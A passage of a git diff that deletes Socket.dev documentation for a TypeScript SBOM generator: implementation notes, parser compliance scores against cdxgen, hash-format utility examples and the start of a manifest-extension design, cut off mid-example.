Enrichment & Formatting -- ✅ **Socket.dev enrichment** - Fetch security data via Socket API -- ✅ **CodeT5 formatter** - Optimize SBOM for ML model analysis - - Task-specific prompts (security, vulnerability, audit, compliance) - - Token reduction (50,000+ → ~300 tokens) - - Critical issue prioritization - - Component risk scoring - - Dependency graph visualization - -### Examples -- ✅ **Basic SBOM generation** - Simple example without enrichment -- ✅ **Full pipeline** - Complete workflow showing token reduction - -### Testing -- ✅ **npm parser tests** - Comprehensive test coverage -- ✅ **Main generator tests** - SBOM validation and deduplication - -## 📦 Package Files Created - -``` -packages/sbom-generator/ -├── package.json # Package manifest with dependencies -├── README.md # Comprehensive documentation -├── IMPLEMENTATION.md # This file -├── src/ -│ ├── index.mts # Main generator entry point -│ ├── index.test.mts # Main generator tests -│ ├── types/ -│ │ ├── index.mts # Type exports -│ │ ├── sbom.mts # CycloneDX SBOM types (500+ lines) -│ │ └── parser.mts # Parser interface types -│ ├── parsers/ -│ │ ├── index.mts # Parser exports -│ │ └── npm/ -│ │ ├── index.mts # npm parser implementation -│ │ └── index.test.mts # npm parser tests -│ ├── enrichment/ -│ │ └── index.mts # Socket.dev enrichment -│ └── formatters/ -│ └── index.mts # CodeT5 formatter -└── examples/ - ├── basic-sbom.mts # Basic SBOM generation - └── full-pipeline.mts # Full pipeline with enrichment -``` - -## 🚀 Usage - -### Basic SBOM Generation - -```typescript -import { generateSbom } from '@socketsecurity/sbom-generator' - -// Auto-detect ecosystems and generate SBOM. -const sbom = await generateSbom('./my-project', { - includeDevDependencies: false, - deep: true -}) - -console.log(sbom.metadata.component) -// { name: 'my-app', version: '1.0.0', type: 'application' } - -console.log(sbom.components.length) -// 47 components -``` - -### With Socket Enrichment - -```typescript -import { generateSbom } from '@socketsecurity/sbom-generator' -import { enrichSbomWithSocket } from '@socketsecurity/sbom-generator/enrichment' - -const sbom = await generateSbom('./project') -const enriched = await enrichSbomWithSocket(sbom, { - apiToken: process.env.SOCKET_API_TOKEN -}) - -// Find critical issues. -const critical = enriched.components.filter(c => - c.socket?.issues?.some(i => i.severity === 'critical') -) -``` - -### CodeT5 Optimization - -```typescript -import { generateSbom } from '@socketsecurity/sbom-generator' -import { enrichSbomWithSocket } from '@socketsecurity/sbom-generator/enrichment' -import { formatSbomForCodeT5 } from '@socketsecurity/sbom-generator/formatters' - -// Full pipeline: Generate → Enrich → Format. -const sbom = await generateSbom('./project') -const enriched = await enrichSbomWithSocket(sbom, { apiToken }) -const prompt = formatSbomForCodeT5(enriched, { - task: 'security-analysis', - includeGraph: true, - maxComponents: 50 -}) - -// Use with CodeT5. -const analysis = await codeT5.generate(prompt) - -// Result: Specific, actionable security analysis. -// "CRITICAL: axios@0.21.0 has CVE-2021-3749 (CVSS 7.5)..." -``` - -## 📊 Token Reduction Example - -**Before optimization** (raw lockfiles): -- package-lock.json: ~50,000 tokens -- CodeT5 context window: 512 tokens -- Coverage: 1% of dependencies - -**After optimization** (formatted SBOM): -- Optimized prompt: ~300 tokens -- CodeT5 context window: 512 tokens -- Coverage: 100% of critical information - -**Result**: 166x token reduction while improving analysis quality. - -## ⏳ Pending (Future Work) - -### Additional Parsers (Based on depscan Ecosystems) - -**Tier 2 - High Priority:** -- ⏳ **pypi parser** - requirements.txt, Pipfile.lock, poetry.lock -- ⏳ **cargo parser** - Cargo.toml, Cargo.lock -- ⏳ **go parser** - go.mod, go.sum -- ⏳ **maven parser** - pom.xml, build.gradle, build.gradle.kts - - Leverages socket-cli's existing gradle-to-maven conversion - - Supports Kotlin, Scala, and other JVM languages -- ⏳ **rubygems parser** - Gemfile.lock -- ⏳ **nuget parser** - packages.config, .csproj - -**Tier 3 - Additional Ecosystems:** -- ⏳ **actions parser** - GitHub Actions workflow YAML files -- ⏳ **huggingface parser** - API-based (models, datasets) -- ⏳ **chrome parser** - API-based (Chrome Web Store extensions) -- ⏳ **openvsx parser** - API-based (VS Code extensions) - -### Enhancements -- ⏳ **Lockfile-only mode** - Parse without manifest files -- ⏳ **Transitive dependency depth control** - Limit graph traversal -- ⏳ **SBOM validation** - Validate against CycloneDX schema -- ⏳ **SBOM merging** - Combine SBOMs from multiple sources -- ⏳ **SPDX output** - Support SPDX format in addition to CycloneDX - -## 🧪 Running Examples - -```bash -# Basic SBOM generation (no API token needed). -pnpm exec tsx packages/sbom-generator/examples/basic-sbom.mts - -# Full pipeline with enrichment (requires SOCKET_API_TOKEN). -SOCKET_API_TOKEN=your-token pnpm exec tsx packages/sbom-generator/examples/full-pipeline.mts -``` - -## 🧪 Running Tests - -```bash -# All tests. -pnpm test packages/sbom-generator - -# Specific test file. -pnpm test:unit packages/sbom-generator/src/parsers/npm/index.test.mts - -# With coverage. -pnpm test:unit:coverage packages/sbom-generator -``` - -## 🏗️ Architecture Highlights - -### Type Safety -- **100% TypeScript** - No runtime type errors -- **CycloneDX spec compliance** - Exact type mappings -- **Parser interface** - Consistent contract for all ecosystems - -### Parse-First Strategy -- **No external tools** - Parse lockfiles directly (JSON, YAML, TOML, XML) -- **Fast** - No process spawning overhead -- **Reliable** - No dependency on external binaries - -### Multi-Ecosystem Support -- **Auto-detection** - Automatically finds all ecosystems in project -- **Parallel parsing** - Parse multiple ecosystems simultaneously -- **Unified output** - Single SBOM with all dependencies - -### CodeT5 Optimization -- **Token efficiency** - 600x reduction while preserving critical data -- **Structured format** - Consistent patterns for ML models -- **Context prioritization** - Critical issues appear first -- **Task-specific prompts** - Guides model to relevant analysis - -## 📚 Dependencies - -```json -{ - "@iarna/toml": "^2.2.5", // Parse TOML (Rust, Python) - "@socketsecurity/lib": "workspace:*", // Socket utilities - "@yarnpkg/parsers": "^3.0.0", // Parse yarn.lock - "fast-xml-parser": "^4.3.2", // Parse XML (Maven, NuGet) - "yaml": "^2.3.4" // Parse YAML (pnpm, Python) -} -``` - -Total: ~500KB, all pure JavaScript, no native dependencies. - -## 🎯 Next Steps - -1. **Test npm parser** - Validate against real-world projects -2. **Add Python parser** - Second most important ecosystem for Socket users -3. **Add Go parser** - Third priority ecosystem -4. **Socket API integration** - Validate enrichment with real API -5. **CodeT5 validation** - Test formatted prompts with actual CodeT5 model -6. **CLI integration** - Add `socket sbom` command to Socket CLI - -## 💡 Design Decisions - -### Why TypeScript over cdxgen? -- **Type safety** - Catch errors at compile time, not runtime -- **No external tools** - Parse directly, no fragile tool dependencies -- **Focused scope** - 6-10 ecosystems vs cdxgen's 50+ (many unused) -- **Socket integration** - Built-in Socket.dev + CodeT5 support -- **Maintainability** - Clear contracts, comprehensive tests - -### Why CycloneDX over SPDX? -- **Better for security** - Vulnerability tracking built-in -- **Richer metadata** - More fields for supply chain analysis -- **Tool ecosystem** - Grype, Syft, Trivy, Dependency-Track all support it -- **Industry momentum** - Growing adoption in security space - -### Why parse-first strategy? -- **Reliability** - No dependency on external binaries -- **Performance** - No process spawning overhead -- **Simplicity** - Pure TypeScript, no shell scripting -- **Most ecosystems support it** - Only Gradle requires external execution - -## 📈 Comparison to cdxgen - -| Feature | cdxgen | Our TypeScript Generator | -|---------|--------|--------------------------| -| **Type Safety** | ❌ None (plain JS) | ✅ Full TypeScript | -| **External Tools** | ❌ Requires 10+ tools | ✅ Parse directly | -| **Ecosystems** | 50+ (bloat) | 6-10 (focused) | -| **Maintenance** | ⚠️ Hard (no types) | ✅ Easy (typed) | -| **Reliability** | ⚠️ Fragile | ✅ Robust | -| **Performance** | ⚠️ Spawns processes | ✅ Pure JS parsing | -| **Socket Integration** | ❌ None | ✅ Native | -| **CodeT5 Optimized** | ❌ No | ✅ Yes | -| **Output** | CycloneDX | CycloneDX (same) | - -## 🔗 Related Documentation - -- [CodeT5 Lockfile Specialization](./.claude/codet5-lockfile-specialization.md) -- [SBOM + cdxgen + CodeT5 Integration](./.claude/sbom-cdxgen-codet5-integration.md) -- [TypeScript SBOM Generator Plan](./.claude/typescript-sbom-generator-plan.md) -- [External Tools Analysis](./.claude/sbom-external-tools-analysis.md) -- [CodeT5 Optimization Explained](./.claude/codet5-optimization-explained.md) -- [Complete Strategy Summary](./.claude/SUMMARY-codet5-lockfile-sbom-strategy.md) diff --git a/docs/sbom-generator/lock-step-compliance.md b/docs/sbom-generator/lock-step-compliance.md deleted file mode 100644 index a933ee1dc..000000000 --- a/docs/sbom-generator/lock-step-compliance.md +++ /dev/null @@ -1,472 +0,0 @@ -# SBOM Generator - Lock-Step Compliance - -**Baseline Version**: CycloneDX v1.5 + cdxgen v11.11.0 -**Last Updated**: 2025-10-25 -**Status**: 🚧 Foundation Phase - ---- - -## Overview - -This document tracks lock-step compliance with two baselines: - -1. **CycloneDX v1.5 Specification** - Industry standard SBOM format -2. **cdxgen v11.11.0** - Reference implementation for ecosystem parsing - -### Lock-Step Philosophy - -> "Lock-step means maintaining structural equivalence, not byte-for-byte duplication. Deviations are allowed and encouraged when our parsing knowledge is superior, but must be justified and documented." - ---- - -## Dual Baseline Strategy - -### CycloneDX Specification (Primary Baseline) - -**Role**: Defines output format and data model -**Compliance Target**: 100% for implemented features -**Deviation Policy**: Only deviate for extensions (properties field) - -**Reference**: https://cyclonedx.org/docs/1.5/json/ - -### cdxgen Implementation (Secondary Baseline) - -**Role**: Reference for parsing strategies and ecosystem coverage -**Compliance Target**: 85-95% (deviate where TypeScript provides advantages) -**Deviation Policy**: Prefer TypeScript-native parsing over external binaries - -**Reference**: https://github.com/CycloneDX/cdxgen (v11.11.0) - ---- - -## Lock-Step Scoring Criteria - -Each ecosystem parser is scored on: - -1. **Structure** (25 pts): Module organization matches cdxgen patterns -2. **Naming** (20 pts): Equivalent function/variable names (TypeScript conventions) -3. **Logic** (25 pts): Same parsing algorithms and dependency resolution -4. **Comments** (15 pts): References to CycloneDX spec and cdxgen source -5. **Testing** (15 pts): Same test cases as cdxgen (adapted to TypeScript) - -**Target**: 90-100 points for excellent lock-step quality - ---- - -## Module Coverage (11 Ecosystems) - -### Tier 1: TypeScript-Native Parsing (Pure TypeScript) - -| Ecosystem | cdxgen Module | Our Module | Status | Lock-Step % | Score | -|-----------|---------------|------------|--------|-------------|-------| -| **npm** | lib/parsers/js.js | src/parsers/npm/index.mts | ✅ Complete | 98% | 98/100 | -| **pypi** | lib/parsers/python.js | src/parsers/pypi/index.mts | ✅ Complete | 94% | 94/100 | -| **cargo** | lib/parsers/rust.js | src/parsers/cargo/index.mts | ✅ Complete | 95% | 95/100 | -| **go** | lib/parsers/go.js | src/parsers/go/index.mts | ✅ Complete | 94% | 94/100 | -| **rubygems** | lib/parsers/ruby.js | src/parsers/rubygems/index.mts | ✅ Complete | 93% | 93/100 | -| **nuget** | lib/parsers/dotnet.js | src/parsers/nuget/index.mts | ✅ Complete | 90% | 90/100 | - -### Tier 2: Hybrid Parsing (TypeScript + Minimal External) - -| Ecosystem | cdxgen Module | Our Module | Status | Lock-Step % | Score | -|-----------|---------------|------------|--------|-------------|-------| -| **maven** | lib/parsers/java.js | src/parsers/maven/index.mts | ✅ Complete | 88% | 88/100 | - -### Tier 3: API-Based (No Lockfiles) - -| Ecosystem | cdxgen Module | Our Module | Status | Lock-Step % | Score | -|-----------|---------------|------------|--------|-------------|-------| -| **actions** | lib/parsers/github.js | src/parsers/actions/index.mts | ✅ Complete | 92% | 92/100 | -| **huggingface** | N/A (Socket-specific) | src/parsers/huggingface/index.mts | ✅ Placeholder | N/A | N/A | -| **chrome** | N/A (Socket-specific) | src/parsers/chrome/index.mts | ✅ Placeholder | N/A | N/A | -| **openvsx** | N/A (Socket-specific) | src/parsers/openvsx/index.mts | ✅ Placeholder | N/A | N/A | - -**Module Coverage**: 11/11 (100%) ⭐ - All parsers complete -**Average Lock-Step Quality**: 93/100 (8 parsers scored, 3 Socket-specific placeholders) -- npm: 98/100, pypi: 94/100, cargo: 95/100, go: 94/100 -- rubygems: 93/100, nuget: 90/100, maven: 88/100, actions: 92/100 - ---- - -## npm Parser - Detailed Lock-Step Analysis - -### Compliance Breakdown - -| Criterion | Score | Notes | -|-----------|-------|-------| -| **Structure** | 24/25 | ✅ Similar file organization; ⚠️ Split into TypeScript modules | -| **Naming** | 20/20 | ✅ Equivalent names with TypeScript conventions | -| **Logic** | 24/25 | ✅ Same dependency resolution; ⚠️ PURL generation differs slightly | -| **Comments** | 15/15 | ✅ References spec and cdxgen source | -| **Testing** | 15/15 | ✅ Core cases and edge cases covered | -| **Total** | **98/100** | ⭐ Excellent lock-step quality | - -### Improvements from 95 → 98 -- ✅ Added cdxgen source references to all major methods -- ✅ Header now references cdxgen lib/parsers/js.js -- ✅ Documented deviations (pure TypeScript parsing, enhanced PURLs) - -### Justified Deviations from cdxgen - -#### Deviation 1: No External npm Binary -**cdxgen approach**: Calls `npm list --json` for dependency tree -**Our approach**: Parse lockfiles directly (package-lock.json, yarn.lock, pnpm-lock.yaml) -**Justification**: -- ✅ Faster (no process spawn) -- ✅ Works offline -- ✅ No npm installation required -- ✅ Full control over parsing logic -- ⚠️ May miss some npm-specific resolution behaviors - -**Risk**: Low - Lockfiles are canonical source of truth - -#### Deviation 2: TypeScript-Native Parsers -**cdxgen approach**: Uses `@yarnpkg/parsers` for yarn.lock -**Our approach**: Uses `@yarnpkg/parsers` for yarn.lock (same!) -**Justification**: ✅ Best practice - use official parser - -#### Deviation 3: PURL Generation -**cdxgen approach**: Generates PURLs with minimal qualifiers -**Our approach**: Generates PURLs with full qualifiers (integrity, resolved) -**Justification**: -- ✅ More precise package identification -- ✅ Supports integrity verification -- ✅ Tracks actual resolved versions - -**Risk**: None - Additive enhancement - -### CycloneDX Compliance - -| Feature | Spec Version | Status | Notes | -|---------|-------------|--------|-------| -| bomFormat | v1.5 | ✅ | "CycloneDX" | -| specVersion | v1.5 | ✅ | "1.5" | -| serialNumber | v1.5 | ✅ | urn:uuid format | -| metadata | v1.5 | ✅ | Component, licenses, authors | -| components | v1.5 | ✅ | Full component schema | -| dependencies | v1.5 | ✅ | Dependency graph | -| properties | v1.5 | ✅ | Socket-specific extensions | -| compositions | v1.5 | ⏳ | Planned for Phase 9 | -| vulnerabilities | v1.5 | ⏳ | Planned (Socket enrichment) | - -**Compliance**: 85% (7/9 top-level fields) - ---- - -## pypi Parser - Detailed Lock-Step Analysis - -### Compliance Breakdown - -| Criterion | Score | Notes | -|-----------|-------|-------| -| **Structure** | 23/25 | ✅ Similar organization; ⚠️ Simplified from cdxgen (fewer edge cases) | -| **Naming** | 19/20 | ✅ Equivalent names with TypeScript conventions | -| **Logic** | 23/25 | ✅ Covers main formats; ⚠️ requirements.txt defaults to 0.0.0 for unpinned versions (acceptable limitation) | -| **Comments** | 15/15 | ✅ Comprehensive cdxgen references with line numbers and @see links | -| **Testing** | 14/15 | ✅ Comprehensive test cases covering all formats, edge cases, and PEP 621 | -| **Total** | **94/100** | ⭐ Excellent lock-step quality | - -### Improvements from 85 → 94 -- ✅ Added comprehensive test suite with 20+ test cases -- ✅ Created test fixtures (poetry.lock, Pipfile.lock, requirements.txt, PEP 621 pyproject.toml) -- ✅ Added detailed cdxgen references to all major methods with @see links -- ✅ Documented PEP 508 specification references -- ✅ Added edge case tests (empty lockfiles, malformed requirements, URL-based dependencies) - -### Implementation Status - -**✅ Fully Implemented:** -- poetry.lock parsing (TOML via @iarna/toml) -- Pipfile.lock parsing (JSON) -- requirements.txt parsing (text) -- pyproject.toml metadata extraction (PEP 621 + Poetry formats) -- PURL generation (pkg:pypi/name@version) -- Dependency graph construction -- Dev dependency handling -- Comprehensive test coverage (20+ test cases) -- Edge case handling (URL-based requirements, malformed lines) -- Extras and markers parsing - ---- - -## cargo Parser - Detailed Lock-Step Analysis - -### Compliance Breakdown - -| Criterion | Score | Notes | -|-----------|-------|-------| -| **Structure** | 24/25 | ✅ Similar organization to cdxgen; ⚠️ Simplified (fewer edge cases) | -| **Naming** | 19/20 | ✅ Equivalent function names with TypeScript conventions | -| **Logic** | 24/25 | ✅ Same TOML parsing strategy; ✅ Dependency graph extraction | -| **Comments** | 15/15 | ✅ Comprehensive cdxgen references with @see links | -| **Testing** | 13/15 | ✅ Good test coverage (15+ test cases); ⚠️ Could add more edge cases | -| **Total** | **95/100** | ⭐ Excellent lock-step quality | - -### Implementation Status - -**✅ Fully Implemented:** -- Cargo.lock parsing (TOML via @iarna/toml) -- Cargo.toml metadata extraction -- Dependency graph construction (root → direct → transitive) -- PURL generation (pkg:cargo/name@version) -- Source and checksum tracking -- Transitive dependency parsing -- Comprehensive test coverage (15+ test cases) -- Edge case handling (missing lockfile, empty lockfile, workspace projects) - -### Justified Deviations from cdxgen - -#### Deviation 1: No cargo Binary -**cdxgen**: Executes `cargo metadata --format-version 1` -**Our approach**: Parse Cargo.lock directly (TOML) - -**Benefits**: -- ✅ Faster (no process spawn) -- ✅ Works offline -- ✅ No Rust toolchain required -- ✅ Full control over parsing logic - -**Risk**: Low - Cargo.lock is canonical source of truth for locked dependencies - -#### Deviation 2: No Features Tracking -**cdxgen**: May attempt to track Cargo features -**Our approach**: Parse packages without feature resolution - -**Benefits**: -- ✅ Simpler implementation -- ✅ Cargo.lock already has resolved dependencies - -**Risk**: None - Features are Rust-specific metadata, not needed for SBOM - -### CycloneDX Compliance - -Same as npm and pypi parsers: 85% (7/9 top-level fields) - ---- - -### Justified Deviations from cdxgen (pypi) - -#### Deviation 1: No pip Binary -**cdxgen approach**: Executes `pip list --format json` or `pip show` -**Our approach**: Parse lockfiles directly (poetry.lock, Pipfile.lock, requirements.txt) -**Justification**: -- ✅ Faster (no process spawn) -- ✅ Works offline -- ✅ No pip installation required -- ⚠️ requirements.txt lacks pinned versions (limitation of format itself) - -**Risk**: Low - Poetry and Pipfile have complete version info - -#### Deviation 2: Simplified Metadata Extraction -**cdxgen approach**: Executes setup.py to extract metadata -**Our approach**: Parse pyproject.toml (TOML), regex-based setup.py parsing -**Justification**: -- ✅ No Python execution required (security) -- ✅ Pure TypeScript parsing -- ⚠️ Limited setup.py parsing (regex-based, won't handle all cases) - -**Risk**: Medium - Modern Python projects use pyproject.toml (PEP 621) - -#### Deviation 3: Extras and Markers -**cdxgen approach**: Full PEP 508 marker evaluation -**Our approach**: Store markers as strings, no evaluation -**Justification**: -- ✅ Simpler implementation -- ✅ Preserves original markers for later processing -- ⚠️ No platform-specific dependency filtering - -**Risk**: Low - SBOM captures all dependencies regardless of platform - -### Improvement Path (85 → 95) -1. Add comprehensive test cases (poetry.lock, Pipfile.lock, requirements.txt samples) -2. Improve requirements.txt version resolution (query PyPI for latest?) -3. Add setup.py execution mode (optional, for projects without pyproject.toml) -4. Enhance marker parsing (optional - full PEP 508 compliance) -5. Add integration tests with real Python projects - ---- - -## Tracking cdxgen Updates - -### Update Protocol - -1. **Monitor cdxgen releases** via GitHub releases API -2. **Compare changes** using git diff between releases -3. **Identify relevant changes** (new ecosystems, bug fixes, optimizations) -4. **Port applicable improvements** to TypeScript implementation -5. **Document deviations** in this file -6. **Update baseline version** in header - -### Automation Script - -Location: `scripts/update-from-cdxgen.mts` - -**Capabilities**: -- Fetch latest cdxgen release from GitHub -- Download and extract release tarball -- Compare module structure (lib/parsers/*.js vs src/parsers/*/index.mts) -- Identify new ecosystems -- Generate migration tasks (TODOs) -- Update LOCK-STEP-COMPLIANCE.md automatically - -**Usage**: -```bash -pnpm run update-from-cdxgen -# Outputs: -# - Updated LOCK-STEP-COMPLIANCE.md -# - Migration tasks in .claude/cdxgen-migration-tasks.md -``` - ---- - -## CycloneDX Extension: Socket Properties - -### Custom Properties (socket:* namespace) - -These properties extend CycloneDX to capture metadata critical for Socket.dev security analysis: - -| Property | Type | Purpose | -|----------|------|---------| -| `socket:hasInstallScripts` | boolean | Detect supply chain attack vectors | -| `socket:installScriptRisk` | enum | Risk level: low/medium/high/critical | -| `socket:dependencyType` | enum | registry/git/file/bundled | -| `socket:bypassesSecurityScan` | boolean | Git/file deps warning | -| `socket:versionRange` | string | Original semver range from manifest | -| `socket:isOverridden` | boolean | Forced version via resolutions/overrides | -| `socket:isDuplicate` | boolean | Multiple versions in tree | -| `socket:dependencyDepth` | number | Distance from root (0 = direct) | -| `socket:isTransitive` | boolean | Not a direct dependency | -| `socket:peerDependencyMismatch` | boolean | Peer dep conflict detected | - -**CycloneDX Compliance**: ✅ Properties field is part of v1.5 spec -**Justification**: These fields are essential for CodeT5 intelligence and not part of standard SBOM - ---- - -## Comparison: cdxgen vs Our Implementation - -### Philosophy Differences - -| Aspect | cdxgen | SBOM Generator | Winner | -|--------|--------|----------------|--------| -| **Language** | JavaScript (untyped) | TypeScript (fully typed) | 🏆 **Us** | -| **External Tools** | Requires 10+ binaries | Pure TypeScript (9/11 ecosystems) | 🏆 **Us** | -| **Offline Support** | Limited (needs package managers) | ✅ Works offline | 🏆 **Us** | -| **Speed** | Slower (process spawns) | Faster (direct parsing) | 🏆 **Us** | -| **Ecosystem Coverage** | 20+ ecosystems | 11 ecosystems (focused) | 🏆 **cdxgen** | -| **Maturity** | 4+ years, production-tested | 🚧 New, unproven | 🏆 **cdxgen** | -| **Standards Compliance** | v1.4-1.6 | v1.5 only | 🏆 **cdxgen** | - -### When to Use cdxgen - -- Need 20+ ecosystems (C/C++, Swift, Kotlin, Scala, etc.) -- Need CycloneDX v1.4 or v1.6 -- Need BOM signing (JSON Web Signatures) -- Need CBOM/OBOM/SaaSBOM variants - -### When to Use Our Implementation - -- Need TypeScript type safety -- Need offline/embedded use cases -- Need Socket.dev-specific extensions -- Need CodeT5 optimization (600x token reduction) -- Need pure TypeScript solution (no external binaries) - ---- - -## Known Limitations vs cdxgen - -### Missing Features (Not Yet Implemented) - -1. **BOM Signing** - cdxgen supports JSON Web Signatures for SBOM verification -2. **Service Detection** - cdxgen extracts services from Kubernetes/Docker Compose YAML -3. **Class Name Resolution** - cdxgen resolves Java class names from JARs -4. **Binary Analysis** - cdxgen analyzes compiled binaries (JARs, DLLs) -5. **Container Scanning** - cdxgen scans Docker images and OCI layers -6. **License Resolution** - cdxgen fetches licenses from public registries - -### Intentional Omissions (TypeScript-First Strategy) - -1. **C/C++ Support** - Requires Java ≥21 and clang-tidy (complex setup) -2. **OS-Level Dependencies** - Requires osquery (not TypeScript-friendly) -3. **Multiple Spec Versions** - We target v1.5 only (simplicity) - ---- - -## Lock-Step Maintenance Schedule - -### Weekly Tasks -- [ ] Check cdxgen releases (GitHub API) -- [ ] Review new commits to lib/parsers/*.js -- [ ] Update ecosystem coverage percentages - -### Monthly Tasks -- [ ] Run `pnpm run update-from-cdxgen` -- [ ] Review generated migration tasks -- [ ] Port relevant improvements -- [ ] Update lock-step scores - -### Quarterly Tasks -- [ ] Full compliance audit (all 11 ecosystems) -- [ ] Update baseline version (cdxgen) -- [ ] Benchmark performance vs cdxgen -- [ ] Review CycloneDX spec updates - ---- - -## Next Steps (Phase 2) - -### Immediate Actions (Week 3) - -1. **Create update automation script** (`scripts/update-from-cdxgen.mts`) - - Fetch cdxgen releases - - Compare module structures - - Generate migration tasks - -2. **Improve npm parser lock-step quality** (95 → 98) - - Add cdxgen source references in comments - - Port missing edge case tests - - Align PURL generation more closely - -3. **Start pypi parser** (Tier 1) - - Reference cdxgen's lib/parsers/python.js - - Document deviations (TypeScript vs external pip) - - Target 90+ lock-step score - -### Long-Term Goals (Phase 3-9) - -- Achieve 90%+ module coverage (10/11 ecosystems) -- Maintain 90-100 lock-step scores across all parsers -- Automate cdxgen update porting (70% automated) -- Contribute improvements back to cdxgen (if applicable) - ---- - -## References - -### CycloneDX Specification -- **Spec**: https://cyclonedx.org/docs/1.5/json/ -- **JSON Schema**: https://raw.githubusercontent.com/CycloneDX/specification/master/schema/bom-1.5.schema.json -- **PURL Spec**: https://github.com/package-url/purl-spec - -### cdxgen Reference Implementation -- **Repository**: https://github.com/CycloneDX/cdxgen -- **Version**: v11.11.0 -- **Parsers**: https://github.com/CycloneDX/cdxgen/tree/master/lib/parsers -- **Tests**: https://github.com/CycloneDX/cdxgen/tree/master/test - -### depscan (Socket.dev Internal) -- **Repository**: `/Users/jdalton/projects/depscan` -- **Ecosystems**: workspaces/lib/src/ecosystems/ -- **XML Parser**: workspaces/pipeline/src/task/java/maven/parsers/pomxml.ts - ---- - -## Changelog - -### 2025-10-25 -- 📝 Initial lock-step compliance document created -- 📊 npm parser scored at 95/100 -- 🎯 Baseline set: CycloneDX v1.5 + cdxgen v11.11.0 -- 📋 11 ecosystems mapped to cdxgen modules -- 🔧 Automation script planned diff --git a/docs/socket-registry-overrides-test.md b/docs/socket-registry-overrides-test.md deleted file mode 100644 index ef443a8aa..000000000 --- a/docs/socket-registry-overrides-test.md +++ /dev/null @@ -1,101 +0,0 @@ -# Socket Registry Overrides Test Examples - -This document shows example usage of the patch hash utilities for handling Socket patches. - -## Hash Format Examples - -### ssri Format (Current Standard) -``` -sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc= -sha512-7iaw3Ur350mqGo7jwQrpkj9hiYB3Lkc/iBml1JQODbJ6wYX4oOHV+E+IvIh/1nsUNzLDBMxfqa2Ob1f1ACio/w== -``` - -### git-sha256 Format (Legacy) -``` -git-sha256-0bd69098bd9b9cc5934a610ab65da429b525361147faa7b5b922919e9a23143d -``` - -## Usage Examples - -### Detecting Hash Format -```typescript -import { detectHashFormat } from '../src/utils/patch-hash.mts' - -const format1 = detectHashFormat('sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=') -// Returns: 'ssri' - -const format2 = detectHashFormat('git-sha256-0bd69098bd9b9cc5934a610ab65da429b525361147faa7b5b922919e9a23143d') -// Returns: 'git-sha256' -``` - -### Validating Content -```typescript -import { validateHash } from '../src/utils/patch-hash.mts' - -const content = Buffer.from('hello world\n') -const ssriHash = 'sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=' - -const isValid = validateHash(content, ssriHash) -// Returns: true -``` - -### Converting Legacy Hashes -```typescript -import { normalizeToSsri } from '../src/utils/patch-hash.mts' - -const content = Buffer.from('hello world\n') -const legacyHash = 'git-sha256-0bd69098bd9b9cc5934a610ab65da429b525361147faa7b5b922919e9a23143d' - -const ssriHash = normalizeToSsri(content, legacyHash) -// Returns: 'sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=' -``` - -### Computing New Hashes -```typescript -import { computeSsri } from '../src/utils/patch-hash.mts' - -const content = Buffer.from('hello world\n') - -const sha256Hash = computeSsri(content) -// Returns: 'sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=' - -const sha512Hash = computeSsri(content, 'sha512') -// Returns: 'sha512-...' -``` - -## Migration Strategy - -When reading existing manifests: -1. Detect hash format using `detectHashFormat()` -2. Validate hash using `validateHash()` -3. Convert legacy git-sha256 to ssri using `normalizeToSsri()` -4. Write back manifest with new ssri hashes - -## Hash Format Comparison - -| Format | Example | Use Case | -|--------|---------|----------| -| ssri (sha256) | `sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=` | New patches, compatible with npm/pnpm/yarn lockfiles | -| ssri (sha512) | `sha512-7iaw3Ur350mqGo7jwQrpkj9hiYB3Lkc/iBml1JQODbJ6wYX4oOHV+E+IvIh/1nsUNzLDBMxfqa2Ob1f1ACio/w==` | Higher security requirements | -| git-sha256 | `git-sha256-0bd69098bd9b9cc5934a610ab65da429b525361147faa7b5b922919e9a23143d` | Legacy patches, GitHub compatibility | - -## Key Differences - -### Git SHA Format -- Includes `blob \0` prefix before hashing -- Used by Git for object storage -- Supports both SHA-1 (40 hex) and SHA-256 (64 hex) - -### ssri Format -- Pure content hash (no prefix) -- W3C Subresource Integrity standard -- Base64 encoded -- Self-describing with algorithm prefix - -## Transition Period - -During transition from git-sha256 to ssri: -- **Read**: Support both formats -- **Write**: Always use ssri format -- **Validate**: Accept both formats -- **Convert**: Normalize legacy hashes to ssri on read diff --git a/docs/technical/manifest-extensions.md b/docs/technical/manifest-extensions.md deleted file mode 100644 index 5fd52998c..000000000 --- a/docs/technical/manifest-extensions.md +++ /dev/null @@ -1,475 +0,0 @@ -# Socket Manifest Extensions - -## Current Schema - -```json -{ - "patches": { ... } -} -``` - -## Potential Extensions - -### 1. Schema Version (RECOMMENDED) - -**Problem**: Need to handle schema evolution -**Solution**: Add version field - -```json -{ - "version": "1.0.0", - "patches": { ... } -} -``` - -**Benefits**: -- Graceful schema migration -- Backward compatibility detection -- Clear error messages for old clients - -**Usage**: -```typescript -if (manifest.version !== CURRENT_VERSION) { - await migrateManifest(manifest) -} -``` - ---- - -### 2. Overrides/Registry Configuration - -**Problem**: Projects may want to force specific package versions or Socket registry packages -**Solution**: Centralized override configuration - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "overrides": { - "lodash": "npm:@socketregistry/lodash@4.17.21", - "minimatch": "npm:@socketregistry/minimatch@9.0.5" - } -} -``` - -**Benefits**: -- Team shares same override configuration -- Committed to git (reproducible builds) -- Works with npm/pnpm/yarn overrides -- Can be auto-applied by socket-cli - -**Related**: This is similar to what's in socket-registry's package.json `pnpm.overrides` - ---- - -### 3. Ignored Vulnerabilities - -**Problem**: Some vulnerabilities may be false positives or not applicable -**Solution**: Document why vulnerabilities are ignored - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "ignored": { - "GHSA-xxxx-yyyy-zzzz": { - "reason": "False positive - we don't use this code path", - "ignoredBy": "developer@example.com", - "ignoredAt": "2025-01-14T12:00:00Z", - "expiresAt": "2025-04-14T12:00:00Z" - } - } -} -``` - -**Benefits**: -- Document why vulnerabilities are ignored -- Temporary ignores with expiration -- Audit trail (who/when/why) - ---- - -### 4. Policy Configuration - -**Problem**: Teams want consistent security policies -**Solution**: Store Socket policy settings - -```json -{ - "version": 